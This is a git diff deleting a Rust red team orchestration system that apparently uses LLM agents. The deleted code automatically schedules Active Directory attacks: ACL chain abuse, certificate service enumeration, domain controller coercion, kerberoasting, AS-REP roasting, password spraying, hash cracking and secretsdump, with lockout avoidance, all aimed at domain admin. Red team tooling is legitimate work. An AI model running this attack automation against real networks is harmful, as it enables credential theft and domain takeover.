ares-orchestrator/src/state/shared.rs | 234 ------ ares-orchestrator/src/task_queue.rs | 488 ------------ ares-orchestrator/src/throttling.rs | 440 ---------- .../src/tool_dispatcher/auth_throttle.rs | 88 -- .../src/tool_dispatcher/local.rs | 91 --- ares-orchestrator/src/tool_dispatcher/mod.rs | 228 ------ .../src/tool_dispatcher/redis_dispatcher.rs | 165 ---- .../src/tool_dispatcher/tests.rs | 98 --- ares-worker/Cargo.toml | 33 - ares-worker/build.rs | 95 --- ares-worker/src/blue_task_loop.rs | 385 --------- ares-worker/src/config.rs | 199 ----- ares-worker/src/heartbeat.rs | 155 ---- ares-worker/src/hosts.rs | 238 ------ ares-worker/src/main.rs | 161 ---- ares-worker/src/task_loop/executor.rs | 415 ---------- ares-worker/src/task_loop/mod.rs | 236 ------ ares-worker/src/task_loop/result_handler.rs | 215 ----- ares-worker/src/task_loop/types.rs | 180 ----- ares-worker/src/tool_check.rs | 273 ------- ares-worker/src/tool_executor.rs | 452 ----------- 97 files changed, 23911 deletions(-) delete mode 100644 ares-orchestrator/Cargo.toml delete mode 100644 ares-orchestrator/src/automation/acl.rs delete mode 100644 ares-orchestrator/src/automation/adcs.rs delete mode 100644 ares-orchestrator/src/automation/bloodhound.rs delete mode 100644 ares-orchestrator/src/automation/coercion.rs delete mode 100644 ares-orchestrator/src/automation/crack.rs delete mode 100644 ares-orchestrator/src/automation/credential_access.rs delete mode 100644 ares-orchestrator/src/automation/credential_expansion.rs delete mode 100644 ares-orchestrator/src/automation/delegation.rs delete mode 100644 ares-orchestrator/src/automation/gmsa.rs delete mode 100644 ares-orchestrator/src/automation/golden_ticket.rs delete mode 100644 ares-orchestrator/src/automation/mod.rs delete mode 100644 ares-orchestrator/src/automation/mssql.rs delete mode 100644 ares-orchestrator/src/automation/refresh.rs delete mode 100644 ares-orchestrator/src/automation/s4u.rs delete mode 100644 ares-orchestrator/src/automation/secretsdump.rs delete mode 100644 ares-orchestrator/src/automation/share_enum.rs delete mode 100644 ares-orchestrator/src/automation/shares.rs delete mode 100644 ares-orchestrator/src/automation/stall_detection.rs delete mode 100644 ares-orchestrator/src/automation/trust.rs delete mode 100644 ares-orchestrator/src/automation/unconstrained.rs delete mode 100644 ares-orchestrator/src/automation_spawner.rs delete mode 100644 ares-orchestrator/src/blue/auto_submit.rs delete mode 100644 ares-orchestrator/src/blue/callbacks.rs delete mode 100644 ares-orchestrator/src/blue/chaining.rs delete mode 100644 ares-orchestrator/src/blue/investigation.rs delete mode 100644 ares-orchestrator/src/blue/mod.rs delete mode 100644 ares-orchestrator/src/blue/runner.rs delete mode 100644 ares-orchestrator/src/blue/sub_agent.rs delete mode 100644 ares-orchestrator/src/bootstrap.rs delete mode 100644 ares-orchestrator/src/callback_handler/dispatch.rs delete mode 100644 ares-orchestrator/src/callback_handler/mod.rs delete mode 100644 ares-orchestrator/src/callback_handler/query.rs delete mode 100644 ares-orchestrator/src/callback_handler/tests.rs delete mode 100644 ares-orchestrator/src/completion.rs delete mode 100644 ares-orchestrator/src/config.rs delete mode 100644 ares-orchestrator/src/cost_summary.rs delete mode 100644 ares-orchestrator/src/deferred.rs delete mode 100644 ares-orchestrator/src/dispatcher/mod.rs delete mode 100644 ares-orchestrator/src/dispatcher/submission.rs delete mode 100644 ares-orchestrator/src/dispatcher/task_builders.rs delete mode 100644 ares-orchestrator/src/exploitation.rs delete mode 100644 ares-orchestrator/src/llm_runner.rs delete mode 100644 ares-orchestrator/src/main.rs delete mode 100644 ares-orchestrator/src/monitoring.rs delete mode 100644 ares-orchestrator/src/output_extraction/hashes.rs delete mode 100644 ares-orchestrator/src/output_extraction/hosts.rs delete mode 100644 ares-orchestrator/src/output_extraction/mod.rs delete mode 100644 ares-orchestrator/src/output_extraction/passwords.rs delete mode 100644 ares-orchestrator/src/output_extraction/shares.rs delete mode 100644 ares-orchestrator/src/output_extraction/tests.rs delete mode 100644 ares-orchestrator/src/output_extraction/users.rs delete mode 100644 ares-orchestrator/src/recovery/dedup.rs delete mode 100644 ares-orchestrator/src/recovery/manager.rs delete mode 100644 ares-orchestrator/src/recovery/mod.rs delete mode 100644 ares-orchestrator/src/recovery/normalize.rs delete mode 100644 ares-orchestrator/src/recovery/requeue.rs delete mode 100644 ares-orchestrator/src/recovery/resume_helper.rs delete mode 100644 ares-orchestrator/src/recovery/types.rs delete mode 100644 ares-orchestrator/src/result_processing/admin_checks.rs delete mode 100644 ares-orchestrator/src/result_processing/discovery_polling.rs delete mode 100644 ares-orchestrator/src/result_processing/mod.rs delete mode 100644 ares-orchestrator/src/result_processing/parsing.rs delete mode 100644 ares-orchestrator/src/result_processing/tests.rs delete mode 100644 ares-orchestrator/src/result_processing/timeline.rs delete mode 100644 ares-orchestrator/src/results.rs delete mode 100644 ares-orchestrator/src/routing.rs delete mode 100644 ares-orchestrator/src/state/dedup.rs delete mode 100644 ares-orchestrator/src/state/inner.rs delete mode 100644 ares-orchestrator/src/state/mod.rs delete mode 100644 ares-orchestrator/src/state/persistence.rs delete mode 100644 ares-orchestrator/src/state/publishing/credentials.rs delete mode 100644 ares-orchestrator/src/state/publishing/entities.rs delete mode 100644 ares-orchestrator/src/state/publishing/hosts.rs delete mode 100644 ares-orchestrator/src/state/publishing/milestones.rs delete mode 100644 ares-orchestrator/src/state/publishing/mod.rs delete mode 100644 ares-orchestrator/src/state/shared.rs delete mode 100644 ares-orchestrator/src/task_queue.rs delete mode 100644 ares-orchestrator/src/throttling.rs delete mode 100644 ares-orchestrator/src/tool_dispatcher/auth_throttle.rs delete mode 100644 ares-orchestrator/src/tool_dispatcher/local.rs delete mode 100644 ares-orchestrator/src/tool_dispatcher/mod.rs delete mode 100644 ares-orchestrator/src/tool_dispatcher/redis_dispatcher.rs delete mode 100644 ares-orchestrator/src/tool_dispatcher/tests.rs delete mode 100644 ares-worker/Cargo.toml delete mode 100644 ares-worker/build.rs delete mode 100644 ares-worker/src/blue_task_loop.rs delete mode 100644 ares-worker/src/config.rs delete mode 100644 ares-worker/src/heartbeat.rs delete mode 100644 ares-worker/src/hosts.rs delete mode 100644 ares-worker/src/main.rs delete mode 100644 ares-worker/src/task_loop/executor.rs delete mode 100644 ares-worker/src/task_loop/mod.rs delete mode 100644 ares-worker/src/task_loop/result_handler.rs delete mode 100644 ares-worker/src/task_loop/types.rs delete mode 100644 ares-worker/src/tool_check.rs delete mode 100644 ares-worker/src/tool_executor.rs diff --git a/ares-orchestrator/Cargo.toml b/ares-orchestrator/Cargo.toml deleted file mode 100644 index d8187afb..00000000 --- a/ares-orchestrator/Cargo.toml +++ /dev/null @@ -1,34 +0,0 @@ -[package] -name = "ares-orchestrator" -version = "0.1.0" -edition = "2021" -description = "Rust-native orchestration loop for the Ares red team system" - -[[bin]] -name = "ares-orchestrator" -path = "src/main.rs" - -[features] -default = ["blue"] -blue = ["ares-core/blue", "ares-llm/blue", "ares-tools/blue"] - -[dependencies] -ares-core = { path = "../ares-core", features = ["telemetry"] } -ares-llm = { path = "../ares-llm" } -ares-tools = { path = "../ares-tools" } -serde = { workspace = true } -serde_json = { workspace = true } -serde_yaml = { workspace = true } -tokio = { workspace = true } -redis = { workspace = true } -chrono = { workspace = true } -tracing = { workspace = true } -tracing-subscriber = { workspace = true } -anyhow = { workspace = true } -uuid = { workspace = true } -async-trait = "0.1" -regex = { workspace = true } - -[dev-dependencies] -tokio = { workspace = true } -rstest = "0.26" diff --git a/ares-orchestrator/src/automation/acl.rs b/ares-orchestrator/src/automation/acl.rs deleted file mode 100644 index 1d34c35a..00000000 --- a/ares-orchestrator/src/automation/acl.rs +++ /dev/null @@ -1,149 +0,0 @@ -//! auto_acl_chain_follow -- dispatch ACL chain steps using available creds. - -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Follows ACL chains from BloodHound results, dispatching each step when -/// credentials for the source user are available. -/// Interval: 30s. Each chain is a JSON array of steps; we find the first -/// undispatched step whose source user has known credentials and dispatch it. -pub async fn auto_acl_chain_follow( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Skip if domain admin already achieved - { - let state = dispatcher.state.read().await; - if state.has_domain_admin { - continue; - } - } - - // Collect work items: (dedup_key, chain_step, credential) - let work: Vec<(String, serde_json::Value, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - - if state.acl_chains.is_empty() { - continue; - } - - let mut items = Vec::new(); - - for (chain_idx, chain) in state.acl_chains.iter().enumerate() { - // Each chain is expected to be a JSON array of step objects - let steps = match chain.as_array() { - Some(s) => s, - None => { - // Or it might be an object with a "steps" field - match chain.get("steps").and_then(|v| v.as_array()) { - Some(s) => s, - None => continue, - } - } - }; - - for (step_idx, step) in steps.iter().enumerate() { - let dedup_key = format!("chain:{}:step:{}", chain_idx, step_idx); - - // Skip already dispatched steps - if state.dispatched_acl_steps.contains(&dedup_key) { - continue; - } - if state.is_processed(DEDUP_ACL_STEPS, &dedup_key) { - continue; - } - - // Get the source user for this step - let source_user = step - .get("source") - .or_else(|| step.get("source_user")) - .or_else(|| step.get("from")) - .and_then(|v| v.as_str()) - .unwrap_or(""); - let source_domain = step - .get("source_domain") - .or_else(|| step.get("domain")) - .and_then(|v| v.as_str()) - .unwrap_or(""); - - if source_user.is_empty() { - continue; - } - - // Find credential for the source user - let cred = state.credentials.iter().find(|c| { - c.username.to_lowercase() == source_user.to_lowercase() - && (source_domain.is_empty() - || c.domain.to_lowercase() == source_domain.to_lowercase()) - }); - - if let Some(cred) = cred { - items.push((dedup_key, step.clone(), cred.clone())); - } - - // Only dispatch the first undispatched step per chain - break; - } - } - - items - }; - - // Dispatch each collected step - for (dedup_key, step, cred) in work { - let payload = json!({ - "technique": "acl_chain_step", - "step": step, - "credential": { - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }, - }); - - match dispatcher - .throttled_submit("acl_chain_step", "acl", payload, 4) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - step_key = %dedup_key, - "ACL chain step dispatched" - ); - // Mark as dispatched in both in-memory set and dedup - { - let mut state = dispatcher.state.write().await; - state.dispatched_acl_steps.insert(dedup_key.clone()); - state.mark_processed(DEDUP_ACL_STEPS, dedup_key.clone()); - } - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_ACL_STEPS, &dedup_key) - .await; - } - Ok(None) => {} // deferred or throttled - Err(e) => warn!(err = %e, "Failed to dispatch ACL chain step"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/adcs.rs b/ares-orchestrator/src/automation/adcs.rs deleted file mode 100644 index fb8654ac..00000000 --- a/ares-orchestrator/src/automation/adcs.rs +++ /dev/null @@ -1,79 +0,0 @@ -//! auto_adcs_enumeration -- detect ADCS servers via CertEnroll share. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Detects ADCS servers by looking for CertEnroll shares and dispatches certipy_find. -/// Interval: 30s. Matches Python `_auto_adcs_enumeration`. -pub async fn auto_adcs_enumeration( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Find CertEnroll shares on unprocessed hosts + get a credential - let work: Vec<(String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - let cred = match state - .credentials - .iter() - .find(|c| { - !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .or_else(|| state.credentials.first()) - { - Some(c) => c.clone(), - None => continue, - }; - state - .shares - .iter() - .filter(|s| s.name.to_lowercase() == "certenroll") - .filter(|s| !state.is_processed(DEDUP_ADCS_SERVERS, &s.host)) - .map(|s| { - let domain = state.domains.first().cloned().unwrap_or_default(); - (s.host.clone(), domain, cred.clone()) - }) - .collect() - }; - - for (host_ip, domain, cred) in work { - match dispatcher - .request_certipy_find(&host_ip, &domain, &cred) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, host = %host_ip, "ADCS enumeration dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_ADCS_SERVERS, host_ip.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &host_ip) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch ADCS enumeration"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/bloodhound.rs b/ares-orchestrator/src/automation/bloodhound.rs deleted file mode 100644 index c32794ea..00000000 --- a/ares-orchestrator/src/automation/bloodhound.rs +++ /dev/null @@ -1,81 +0,0 @@ -//! auto_bloodhound -- BloodHound collection per domain. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use ares_llm::routing::find_domain_credential; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Dispatches BloodHound collection for each discovered domain. -/// Interval: 30s. Matches Python `_auto_bloodhound`. -/// -/// Selects the best credential per domain (same-domain preferred, with -/// trust-scope enforcement) instead of using a single global credential. -pub async fn auto_bloodhound(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec<(String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - if state.credentials.is_empty() { - continue; - } - - state - .domains - .iter() - .filter(|d| !state.is_processed(DEDUP_BLOODHOUND_DOMAINS, d)) - .filter_map(|domain| { - let dc_ip = state.domain_controllers.get(domain).cloned()?; - // Select best credential for this specific domain - let cred = find_domain_credential( - domain, - &state.credentials, - &state.netbios_to_fqdn, - &state.trusted_domains, - ); - match cred { - Some(c) => Some((domain.clone(), dc_ip, c.clone())), - None => { - debug!(domain = %domain, "No valid credential for BloodHound"); - None - } - } - }) - .collect() - }; - - for (domain, dc_ip, cred) in work { - match dispatcher.request_bloodhound(&domain, &dc_ip, &cred).await { - Ok(Some(task_id)) => { - info!(task_id = %task_id, domain = %domain, "BloodHound collection dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_BLOODHOUND_DOMAINS, domain.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_BLOODHOUND_DOMAINS, &domain) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch BloodHound"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/coercion.rs b/ares-orchestrator/src/automation/coercion.rs deleted file mode 100644 index bcd83114..00000000 --- a/ares-orchestrator/src/automation/coercion.rs +++ /dev/null @@ -1,78 +0,0 @@ -//! auto_coercion -- trigger ESC8 relay and DC coercion. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Triggers coercion attacks when ADCS ESC8 servers or unconstrained delegation hosts exist. -/// Interval: 30s. Matches Python `_auto_coercion`. -pub async fn auto_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Coerce DCs that haven't been coerced yet - let work: Vec<(String, String)> = { - let state = dispatcher.state.read().await; - // Find any host with unconstrained delegation as a listener - let _listener = state.hosts.iter().find(|h| { - h.roles - .iter() - .any(|r| r.to_lowercase().contains("unconstrained")) - }); - - state - .domain_controllers - .iter() - .filter(|(_, dc_ip)| !state.is_processed(DEDUP_COERCED_DCS, dc_ip)) - .map(|(domain, dc_ip)| (domain.clone(), dc_ip.clone())) - .collect() - }; - - for (domain, dc_ip) in work { - // Find a listener IP for the coercion (any host we own) - let listener_ip = { - let state = dispatcher.state.read().await; - state.hosts.iter().find(|h| h.owned).map(|h| h.ip.clone()) - }; - - let listener = match listener_ip { - Some(ip) => ip, - None => continue, - }; - - match dispatcher - .request_coercion(&dc_ip, &listener, &["petitpotam", "printerbug"]) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, dc = %dc_ip, domain = %domain, "DC coercion dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_COERCED_DCS, dc_ip.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_COERCED_DCS, &dc_ip) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch coercion"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/crack.rs b/ares-orchestrator/src/automation/crack.rs deleted file mode 100644 index 929f746a..00000000 --- a/ares-orchestrator/src/automation/crack.rs +++ /dev/null @@ -1,75 +0,0 @@ -//! auto_crack_dispatch -- submit crack tasks for new hashes. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{debug, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -use super::crack_dedup_key; - -/// Scans for uncracked hashes and submits crack tasks. -/// Interval: 15s. Matches Python `_auto_crack_dispatch`. -pub async fn auto_crack_dispatch(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(15)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Collect unprocessed hashes - let work: Vec<(String, ares_core::models::Hash)> = { - let state = dispatcher.state.read().await; - state - .hashes - .iter() - .filter(|h| h.cracked_password.is_none()) - .filter_map(|h| { - let dedup = crack_dedup_key(h); - if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) { - None - } else { - Some((dedup, h.clone())) - } - }) - .collect() - }; - - // Serialize crack tasks: hashcat only allows one instance at a time. - // Skip this tick if a cracker task is already running. - if dispatcher.tracker.count_for_role("cracker").await > 0 { - debug!("Crack task already active, skipping dispatch this tick"); - continue; - } - - // Only dispatch one crack task per tick to avoid hashcat PID conflicts. - // Remaining hashes will be picked up on subsequent ticks. - if let Some((dedup_key, hash)) = work.into_iter().next() { - match dispatcher.request_crack(&hash).await { - Ok(Some(task_id)) => { - debug!(task_id = %task_id, hash_type = %hash.hash_type, "Crack task dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_CRACK_REQUESTS, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_CRACK_REQUESTS, &dedup_key) - .await; - } - Ok(None) => {} // deferred or throttled - Err(e) => warn!(err = %e, "Failed to dispatch crack task"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/credential_access.rs b/ares-orchestrator/src/automation/credential_access.rs deleted file mode 100644 index a4a40c75..00000000 --- a/ares-orchestrator/src/automation/credential_access.rs +++ /dev/null @@ -1,479 +0,0 @@ -//! auto_credential_access -- kerberoast, AS-REP roast, password spray. - -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Complex credential access automation: kerberoast, AS-REP roast, password spray. -/// Interval: 15s + Notify wake. Matches Python `_auto_credential_access`. -pub async fn auto_credential_access( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let notify = dispatcher.credential_access_notify.clone(); - let mut interval = tokio::time::interval(Duration::from_secs(15)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = notify.notified() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // --- AS-REP Roast: one per domain (unauthenticated — no credentials required) --- - let asrep_work: Vec<(String, String)> = { - let state = dispatcher.state.read().await; - state - .domains - .iter() - .filter(|d| !state.is_processed(DEDUP_ASREP_DOMAINS, d)) - .filter_map(|domain| { - // Try DC map first, then fall back to target_ips[0] - let dc_ip = state - .domain_controllers - .get(domain) - .cloned() - .or_else(|| state.target_ips.first().cloned())?; - Some((domain.clone(), dc_ip)) - }) - .collect() - }; - - for (domain, dc_ip) in asrep_work { - let payload = json!({ - "techniques": ["kerberos_user_enum_noauth", "asrep_roast", "username_as_password"], - "target_ip": dc_ip, - "domain": domain, - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", payload, 5) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, domain = %domain, "AS-REP roast dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_ASREP_DOMAINS, domain.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_ASREP_DOMAINS, &domain) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch AS-REP roast"), - } - } - - // --- Kerberoast: one per domain + credential pair --- - let kerberoast_work: Vec<(String, String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - state - .credentials - .iter() - .filter(|c| !c.domain.is_empty()) - // Skip delegation accounts — Kerberoast is already done with - // other creds, and burning auth on delegation accounts risks - // lockout before S4U can use them. - .filter(|c| !state.is_delegation_account(&c.username)) - // Skip quarantined credentials — locked out, retry after expiry. - .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) - .filter_map(|cred| { - let cred_domain = cred.domain.to_lowercase(); - let dedup = format!("krb:{}:{}", cred_domain, cred.username.to_lowercase()); - if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) { - return None; - } - // Exact domain match first - if let Some(dc_ip) = state.domain_controllers.get(&cred_domain).cloned() { - return Some((dedup, dc_ip, cred_domain, cred.clone())); - } - // Fallback: check child domains (e.g. cred has "contoso.local" - // but user is actually in "child.contoso.local") - let suffix = format!(".{cred_domain}"); - for (domain, dc_ip) in &state.domain_controllers { - if domain.ends_with(&suffix) { - debug!( - cred_domain = %cred_domain, - child_domain = %domain, - "Kerberoast: using child domain DC for parent-domain credential" - ); - return Some((dedup, dc_ip.clone(), domain.clone(), cred.clone())); - } - } - // Last resort: use target_ips[0] if DC map has no entry for this domain - if let Some(fallback_ip) = state.target_ips.first().cloned() { - debug!( - cred_domain = %cred_domain, - fallback_ip = %fallback_ip, - "Kerberoast: using target IP fallback (no DC in map)" - ); - return Some((dedup, fallback_ip, cred_domain, cred.clone())); - } - None - }) - .take(2) - .collect() - }; - - for (dedup_key, dc_ip, resolved_domain, cred) in kerberoast_work { - match dispatcher - .request_credential_access("kerberoast", &dc_ip, &resolved_domain, &cred, 5) - .await - { - Ok(Some(task_id)) => { - debug!(task_id = %task_id, domain = %resolved_domain, "Kerberoast dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_CRACK_REQUESTS, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_CRACK_REQUESTS, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch kerberoast"), - } - } - - // --- Password spray: username-as-password --- - let spray_work: Vec<(String, String, String)> = { - let state = dispatcher.state.read().await; - state - .users - .iter() - .filter(|u| !u.domain.is_empty()) - // Skip delegation accounts — their auth budget is reserved for - // S4U exploitation. Spraying them causes lockout before S4U fires. - .filter(|u| !state.is_delegation_account(&u.username)) - .filter(|u| !state.is_credential_quarantined(&u.username, &u.domain)) - .filter_map(|u| { - let user_domain = u.domain.to_lowercase(); - let dedup = format!("{}:{}", user_domain, u.username.to_lowercase()); - if state.is_processed(DEDUP_USERNAME_SPRAY, &dedup) { - return None; - } - // Exact match or child-domain fallback - let dc_ip = state - .domain_controllers - .get(&user_domain) - .cloned() - .or_else(|| { - let suffix = format!(".{user_domain}"); - state - .domain_controllers - .iter() - .find(|(d, _)| d.ends_with(&suffix)) - .map(|(_, ip)| ip.clone()) - })?; - Some((dedup, dc_ip, u.domain.clone())) - }) - .take(5) - .collect() - }; - - // Submit one spray task per domain (batched) - let mut sprayed_domains = std::collections::HashSet::new(); - for (_dedup_key, dc_ip, domain) in &spray_work { - if sprayed_domains.contains(domain) { - continue; - } - sprayed_domains.insert(domain.clone()); - - let payload = json!({ - "technique": "username_as_password", - "target_ip": dc_ip, - "domain": domain, - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", payload, 4) - .await - { - Ok(Some(task_id)) => { - debug!(task_id = %task_id, domain = %domain, "Password spray dispatched"); - // Mark all users in this domain's batch as processed - for (dk, _, d) in &spray_work { - if d == domain { - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_USERNAME_SPRAY, dk.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_USERNAME_SPRAY, dk) - .await; - } - } - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch password spray"), - } - } - - // --- Low-hanging fruit: SYSVOL, GPP, LDAP descriptions, LAPS per new credential --- - // Mirrors Python's fast credential discovery — dispatches high-success-rate - // techniques that find hardcoded/stored passwords in Active Directory. - let low_hanging_work: Vec<(String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - state - .credentials - .iter() - .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) - // Skip delegation accounts — their auth is reserved for S4U. - .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) - .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) - .filter_map(|cred| { - let cred_domain = cred.domain.to_lowercase(); - let dedup = format!("{}:{}", cred_domain, cred.username.to_lowercase()); - if state.is_processed(DEDUP_LOW_HANGING, &dedup) { - return None; - } - // Find DC for this credential's domain - let dc_ip = state - .domain_controllers - .get(&cred_domain) - .cloned() - .or_else(|| { - let suffix = format!(".{cred_domain}"); - state - .domain_controllers - .iter() - .find(|(d, _)| d.ends_with(&suffix)) - .map(|(_, ip)| ip.clone()) - }) - .or_else(|| state.target_ips.first().cloned())?; - Some((dedup, dc_ip, cred.clone())) - }) - .take(2) // Max 2 per cycle - .collect() - }; - - for (dedup_key, dc_ip, cred) in low_hanging_work { - match dispatcher - .request_low_hanging_fruit(&dc_ip, &cred.domain, &cred, 4) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - domain = %cred.domain, - username = %cred.username, - "Low-hanging fruit credential discovery dispatched" - ); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_LOW_HANGING, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_LOW_HANGING, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch low-hanging fruit"), - } - } - - // --- Secretsdump per new credential against same-domain hosts --- - // Dispatches secretsdump for new credentials against hosts in the same - // domain (or child/parent domains). Cross-domain attempts generate - // failed auths that trigger AD account lockout. - // Credentials may be local admin on member servers — secretsdump fails - // fast if not, but when it succeeds it's the fastest path to DA. - let sd_work: Vec<(String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - - // Skip if already DA - if state.has_domain_admin { - Vec::new() - } else { - let mut items = Vec::new(); - for cred in state - .credentials - .iter() - .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) - // Skip delegation accounts — secretsdump will always fail - // (they're not admin) and burns auth budget needed for S4U. - .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) - .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) - { - let cred_domain = cred.domain.to_lowercase(); - for host in &state.hosts { - // Resolve host domain: prefer hostname FQDN, fall back - // to domain_controllers map for bare-IP hosts. - let host_domain = { - let from_hostname = host - .hostname - .to_lowercase() - .split_once('.') - .map(|x| x.1) - .unwrap_or("") - .to_string(); - if from_hostname.is_empty() { - // Check if this IP is a known DC - state - .domain_controllers - .iter() - .find(|(_, ip)| ip.as_str() == host.ip) - .map(|(d, _)| d.to_lowercase()) - .unwrap_or_default() - } else { - from_hostname - } - }; - // Only target same-domain hosts. Skip unknown-domain - // hosts — they'll be retried next cycle after nmap - // populates hostnames. - if host_domain.is_empty() - || (host_domain != cred_domain - && !host_domain.ends_with(&format!(".{cred_domain}")) - && !cred_domain.ends_with(&format!(".{host_domain}"))) - { - continue; - } - - let dedup = format!( - "{}:{}:{}", - host.ip, - cred_domain, - cred.username.to_lowercase() - ); - if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) { - items.push((dedup, host.ip.clone(), cred.clone())); - } - } - } - items.into_iter().take(5).collect() // Max 5 per cycle - } - }; - - for (dedup_key, target_ip, cred) in sd_work { - let priority = if cred.is_admin { 2 } else { 7 }; - match dispatcher - .request_secretsdump(&target_ip, &cred, priority) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - target = %target_ip, - username = %cred.username, - "Credential secretsdump dispatched" - ); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_SECRETSDUMP, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch credential secretsdump"), - } - } - - // --- Common password spray: per domain when no admin creds found yet --- - // Keep spraying common passwords until we find admin or achieve DA. - let common_spray_work: 